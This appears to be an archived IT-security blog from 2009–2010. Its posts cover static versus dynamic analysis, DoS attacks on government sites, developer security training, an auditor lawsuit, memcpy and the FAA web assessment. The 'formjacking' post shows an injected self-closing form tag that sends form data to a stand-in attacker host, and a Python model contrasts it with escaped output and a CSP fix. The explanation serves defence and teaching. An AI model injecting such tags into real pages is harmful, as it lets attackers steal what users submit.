Archive for the ‘IT Security’ Category

Apps to Hack

August 31st, 2010

Great post to bookmark…this guy has a great list of sites out there that you can practice on.

http://securitythoughts.wordpress.com/2010/03/22/vulnerable-web-applications-for-learning/

Hack away.

Eric IT Security

Cyber Attacks Against DoD Up in 2009

November 20th, 2009

So says an article over at networkworl.com. The crazy part is that the number doesn’t include the attacks that go unnoticed. The DoD, as well as the rest of the world, is still behind the curve on detecting application attacks. I’m betting the numbers in this report should be much larger.

Eric IT Security

The Value of Static Analysis

July 29th, 2009

On the Daily Dave mailing list there’s an interesting discussion about the value of static analysis. For those unaware of what static analysis is: static analysis is analyzing source code to find potential vulnerabilities. Like every technology, static analysis has its pros and cons. I don’t actually subscribe to the mailing list (I only use RSS), so I’m going to write a little about my views on static analysis.

Pros
In the security world, the big fight is between static versus dynamic analysis. By dynamic, most people mean penetration testing. The results from automated penetration tools usually contain low amounts of false positives, but your test is dependent on the tests run by the tool. Pen-testing tools can and do miss vulnerabilities. Static analysis, on the other hand, scans ALL code. If there are vulnerabilities in the corners of your application that are typically not used, then static analysis has a higher probability of finding these vulnerabilities. In addition to finding obscure vulnerabilities, static analysis can also find more categories of vulnerabilities. Automated pen-test tools are limited because they can only see HTTP responses. Static analysis tools can apply rules that are more focused on your development platforms.

Cons
The biggest argument against static analysis is that it produces too many false positives. The common misconception here is that the tool is saying “this is vulnerable”; the tool is actually saying “this is potentially vulnerable and needs to be audited to be sure”. Yes, this creates a lot of work, but this argument really only applies to first-time scans. Most of the major static analysis applications are rule based and give better results over time. After the initial triage, you suppress false positives and create custom rules to make the scan more context specific. For example, on the mailing list someone referred to static analysis tools producing false positives on custom memory management libraries. This is true; out of the box, most scanners are going to flag this because they don’t know what the library does and want human eyes to verify. If you’re using Fortify SCA, you can write a custom rule to eliminate those false positives in the future. Because I’m a Fortify consultant, I know that the more you tailor our static analysis software to your application, the better your result set. Static analysis shouldn’t be a one-shot scan; it should be used continually throughout development and testing.

Conclusion
In the end, it’s not static analysis versus dynamic analysis. In reality, you should be using BOTH. Static analysis is going to give you a sense of how secure your code is. Penetration testing is going to find easily exploitable vulnerabilities. If you are concerned about false positives with static analysis, check out Fortify Program Trace Analyzer (PTA). PTA does static analysis automatically as you are doing functional testing. The results are extremely conservative. If PTA finds a vulnerability, you can usually take it to the bank.

Eric IT Security

U.S. and South Korea Victim of DOS Attack

July 8th, 2009

AP is reporting that the Treasury Department, Secret Service, and “other” agencies were the victim of a Denial of Service attack over the 4th of July weekend. The South Korean government was also attacked, fueling speculation that the attack came from North Korea.

Is North Korea getting smart? Even though they are making advances in their missile technology, they would still get spanked if they went to war with pretty much any of the major nations. In cyberspace though, they could rival the abilities of the major nations.

Even with a small group of hackers, North Korea could plan massive attacks against pretty much anyone they want. Imagine them developing or purchasing a botnet, then using this botnet to launch a Denial of Service attack. These attacks are nearly impossible to block and it would be difficult to trace the attack back to North Korea.

Given the success of this attack, I would expect to see more of this from North Korea in the future. This further underscores the importance of the DoD cyberspace initiatives.

Update: Plot Thickens

There’s more info out now that says this could be a botnet and that some South Koreans are being hit with a virus. The attack is also ongoing…this should be interesting. 

Eric IT Security

Security Training for Developers

June 11th, 2009

I read an interesting question this morning concerning what to teach developers. Should organizations spend time teaching developers hacking techniques or writing secure software? If both, how should they mix it up?

I’m happy to hear questions like this because it’s putting the focus where it needs to be: on developers. For far too long security has been focused on the network. I can’t remember where the statistic came from, but I think ~75% of breaches last year were application based. Training developers to stop vulnerabilities early in the SDLC is the best way of shrinking that percentage.

Teaching developers about hacking techniques is important. I believe Sun Tzu said “know thy enemy” and that was hundreds of years ago. With that being said, developers do not need to know everything about hacking techniques. If an individual developer is interested in software security, encourage them to learn more. This type of developer is referred to as a “satellite” in the Building Security In Maturity Model (BSIMM). Satellites can be extremely useful in raising the awareness of software security and sharing ways to stop vulnerabilities. In BSIMM, they are a crucial part of the success of the Software Security Group (SSG).

Every developer should have a crash course in software security covering the consequences of writing insecure software and the most common attacks. I think the focus should be on writing better software; specifically, writing reusable software that emphasizes security. Keeping developers trained on writing secure software is difficult, so it’s better to take them out of the loop. Try to break your applications up into pieces and use secure frameworks to move information between the layers. This is a much better approach than relying on every developer to know how to prevent security vulnerabilities.

Eric IT Security

Merrick vs. Savvis

June 5th, 2009

The buzz around the cyber security community this week is a court case where a bank has filed suit against an audit firm for damages from a breach. I guess it was just a matter of time before banks began blaming someone else for their lack of security, but this is an interesting case that could have huge consequences.

The auditor in question, Savvis, was responsible for the audit of CardSystems. For those unaware, CardSystems was one of the largest data breaches in history. Savvis certified that CardSystems was CISP (the precursor to PCI) compliant. As a result, Merrick lost millions in fraud claims and replacing cards.

Do we have companies out there giving out PCI compliance without completely doing an audit? Can companies purchase compliance instead of changing their security practices? If this is the case, the whole system breaks down. The credit card companies and consumers rely on these audits to ensure their data is safe.

The other part to this is that no matter how good the auditor, it’s not uncommon for vulnerabilities to slip through the cracks. I can speak from experience: getting the entire picture when doing an audit is difficult, especially if the company is not cooperative. Companies can look compliant on paper and during an inspection, but revert to insecure practices after the audit. This case could set a dangerous precedent for auditors. I can see the prices of audits going up exponentially to pay for the errors and omissions insurance!

Eric IT Security

Microsoft Nixes memcpy

May 15th, 2009

Here’s an article stating that Microsoft has added memcpy to the list of naughty functions. This is really not a surprise in my opinion. For those of you who do not know why this is bad: memcpy copies data from one memory location to another. The problem is that it does not check the size of the receiving location to make sure there is enough room. Over the years, this has caused many vulnerabilities. As any good C/C++ developer knows, good memory management is crucial.

Eric IT Security

Bruce Schneier says No Cyber Czar

May 14th, 2009

Just finished reading a blog post over at Digital Underground saying that Bruce Schneier says we don’t need a cyber czar. I couldn’t disagree with Mr. Schneier more! His criticism is:

"Really what I think is it shouldn’t be anybody. We do better without a top-down hierarchy. Our economic and political systems work best when there isn’t a dictator in charge, when there isn’t one organization in charge. My feeling is there shouldn’t be one organization in charge. Not only shouldn’t it be the NSA, it shouldn’t be anybody."

I believe in federalism, but I don’t think that will work with cyber security. The problem isn’t with a central authority like a cyber czar. The problem is the lack of mandate to make the government networks/applications secure. In my experience, people are more worried about security taking too long to implement and getting blamed for vulnerabilities. If Obama appointed a cyber czar and at the same time signed an executive order mandating that all government network/applications meet a central standard in a reasonable amount of time, our cyber readiness would be much better. That mandate couldn’t be ignored…

In the comments of the above post, one topic being discussed is that IT workers should be certified like engineers or architects. This is an interesting concept, but I’m skeptical of how much this will help. I know of many projects that were certified by a Professional Engineer (PE) that had design issues. PEs are still human…


Eric IT Security

Formjacking

May 13th, 2009

Just read a cool post over at omg.wtf.bbq about a new attack called “formjacking”. Not sure about the attack name, but this is pretty neat. In Firefox 3 and IE7, self-contained XHTML tags provide a way to exploit an XSS vulnerability and alter the action associated with a form tag. I’ve tested this out and it also works with Google Chrome, so the same goes for the other WebKit based browsers like Safari.

The gist is that if you can insert a self-contained form tag, the browser will ignore the other form tags. Let’s say that you have the following code:

<form action="good.php" method="post">
<input type="text" name="test" id="test">
<input type="submit" value="Submit">
</form>

If you can insert a self-closing form tag:

<form action="http://evilhaxor.com/pwned" method="post" />
<form action="good.php" method="post">
<input type="text" name="test" id="test">
<input type="submit" value="Submit">
</form>

Notice the forward slash at the end of the tag? The second form tag will be ignored and the post data will be sent to the inserted action.
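The following is an added example, not code from the original post, showing the defender's side of this: the same page rendered once with raw injection (reproducing the hijacked action described above) and once with output encoding, plus the CSP `form-action` directive as defence in depth. The `FormActionResolver` is a simplified model of the browser behaviour the post describes (an open form swallows later form start tags, and the trailing slash does not close the form); it is built on Python's stdlib `html.parser`, and the comment strings and page template are constructed sample values.

```python
import html
from html.parser import HTMLParser

# Constructed sample values (not from the original post). The page's own form
# matches the one shown above; the comments stand in for visitor-supplied text.
SAFE_COMMENT = "Nice article!"
INJECTED_COMMENT = '<form action="http://evilhaxor.com/pwned" method="post" />'

PAGE_TEMPLATE = """<html><body>
<div class="comment">{comment}</div>
<form action="good.php" method="post">
<input type="text" name="test" id="test">
<input type="submit" value="Submit">
</form>
</body></html>"""


def render_page(comment: str, escape: bool) -> str:
    """Render the page with a visitor comment placed above the form.

    escape=False reproduces the vulnerable behaviour (raw HTML injection);
    escape=True applies output encoding, which is the fix for this bug class.
    """
    body = html.escape(comment, quote=True) if escape else comment
    return PAGE_TEMPLATE.format(comment=body)


class FormActionResolver(HTMLParser):
    """Simplified model of the browser behaviour described in the post.

    Once a <form> is open, any further <form> start tag is ignored, and a
    self-closing <form .../> still opens a form (the slash is not a close).
    Records which form action a named input would be submitted to.
    """

    def __init__(self, input_name: str):
        super().__init__()
        self.input_name = input_name
        self.open_form_action = None
        self.resolved_action = None

    def handle_starttag(self, tag, attrs):
        self._start(tag, dict(attrs))

    def handle_startendtag(self, tag, attrs):
        # html.parser reports <form ... /> here; treat it as a plain start tag,
        # which is what the post says the browsers did.
        self._start(tag, dict(attrs))

    def _start(self, tag, attrs):
        if tag == "form" and self.open_form_action is None:
            self.open_form_action = attrs.get("action")
        elif tag == "input" and attrs.get("name") == self.input_name:
            if self.resolved_action is None:
                self.resolved_action = self.open_form_action

    def handle_endtag(self, tag):
        if tag == "form":
            self.open_form_action = None


def effective_form_action(page_html: str, input_name: str = "test"):
    """Return the action the named input's form would post to, per the model."""
    resolver = FormActionResolver(input_name)
    resolver.feed(page_html)
    resolver.close()
    return resolver.resolved_action


def csp_header() -> tuple:
    """Defence in depth: CSP form-action limits where any form on the page may
    submit, so even an injected form tag cannot post to another origin."""
    return ("Content-Security-Policy", "form-action 'self'")


if __name__ == "__main__":
    for label, comment, escape in [
        ("benign, unescaped", SAFE_COMMENT, False),
        ("injected, unescaped", INJECTED_COMMENT, False),
        ("injected, escaped", INJECTED_COMMENT, True),
    ]:
        print(f"{label}: posts to {effective_form_action(render_page(comment, escape))}")
    print("header: %s: %s" % csp_header())
```

Output encoding on its own closes the hole, because the injected text can no longer form a tag; the CSP header is there for the case where an encoding is missed somewhere else on the page.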

Eric IT Security

FAA Vulnerability Assessment = Bad

May 12th, 2009

The FAA has performed a security assessment of 70 of their web applications and found a large number of vulnerabilities. This doesn’t come as much of a surprise because most government agencies have not cracked down on software security. Besides the vulnerabilities, there are two things that bother me:

1. No Static Analysis – In the methodology section of the memo, it looks like KPMG only used penetration testing for this assessment. I’m not looking to start the typical static versus dynamic testing debate, but I was surprised that static analysis was not a component of this assessment. Automated penetration testing relies on the tool being used to find the vulnerabilities. Depending on the application, this type of testing could miss some critical vulnerabilities. Static analysis provides deeper analysis and can find vulnerabilities not detected by penetration testing tools. Not to mention, using static analysis early in the SDLC will decrease these vulnerabilities before they are released.

2. Separate Standards – In the memo, the writer mentions that the FAA uses “DOT Secure Web Application Standards”. The DoD has their standards, the DoT has their standards, NIST has standards, NSA has standards, etc. There really should be a standard that is applied to all agencies with a mandate from the President. Cybersecurity affects all agencies and we should all be on the same page.

It seems that Obama is taking a stand on cyber security and I hope they take this the right way.

Eric IT Security